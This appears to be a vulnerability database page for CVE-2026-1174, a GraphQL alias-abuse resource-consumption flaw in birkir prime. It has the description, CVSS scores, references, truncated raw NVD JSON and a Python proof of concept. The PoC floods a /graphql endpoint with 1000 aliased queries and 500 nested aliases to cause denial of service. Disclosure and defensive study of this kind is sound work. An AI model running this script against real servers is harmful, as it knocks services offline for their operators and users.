CVE-2026-1174

Description

A vulnerability was determined in birkir prime up to 0.4.0.beta.0. This affects an unknown function of the file /graphql of the component GraphQL Alias Handler. This manipulation causes resource consumption. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:* - VULNERABLE

birkir/prime <= 0.4.0.beta.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-1174 PoC - GraphQL Resource Consumption
# Target: birkir/prime <= 0.4.0.beta.0
# Attack Vector: GraphQL Alias Handler

import requests
import json

TARGET_URL = "http://target.com/graphql"

# PoC: Send a GraphQL query with excessive aliases to consume resources
poc_query = """
query {
"""

# Generate 1000 aliases to trigger resource consumption
for i in range(1000):
    poc_query += f"  alias{i}: someComplexField(id: {i}) {{\n    id\n    name\n    computedValue\n  }}\n"

poc_query += """
}
"""

payload = {
    "query": poc_query
}

print("Sending malicious GraphQL query...")
response = requests.post(TARGET_URL, json=payload, timeout=30)
print(f"Response status: {response.status_code}")
print(f"Response: {response.text[:500]}")

# Alternative PoC with nested aliases
poc_query_2 = """
query {
"""
for i in range(500):
    poc_query_2 += f"  field{i}: nestedObject {{ child {{ subChild {{ value }} }} }}\n"
poc_query_2 += """
}
"""

print("\nSending nested alias query...")
response2 = requests.post(TARGET_URL, json={"query": poc_query_2}, timeout=30)
print(f"Response status: {response2.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1174
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1174
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1174/
[4] VulDB https://vuldb.com/cve/CVE-2026-1174
[5] https://github.com/birkir/prime/
[6] https://github.com/birkir/prime/issues/545
[7] https://vuldb.com/?ctiid.341768
[8] https://vuldb.com/?id.341768
[9] https://vuldb.com/?submit.731105

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1174", "sourceIdentifier": "[email protected]", "published": "2026-01-19T20:15:48.930", "lastModified": "2026-02-23T09:16:49.650", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in birkir prime up to 0.4.0.beta.0. This affects an unknown function of the file /graphql of the component GraphQL Alias Handler. This manipulation causes resource consumption. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en birkir prime hasta la versión 0.4.0.beta.0. Esto afecta a una función desconocida del archivo /graphql del componente GraphQL Alias Handler. Esta manipulación causa consumo de recursos. El ataque puede ser llevado a cabo de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado. El proyecto fue notificado del problema tempranamente a través de un informe de incidencias, pero aún no ha respondido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:birkir:prime:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.4.0", "matchCriteriaId": "65419F9E-4813-4B36-BA74-1839A5525EFC"}]}]}], "references": [{"url": "https://github.com/birkir/prime/", "source": "[email protected]"}, {"url": "https://github.com/birkir/prime/issues/545", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.341768", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341768", "source": "cna@vul ... (truncated)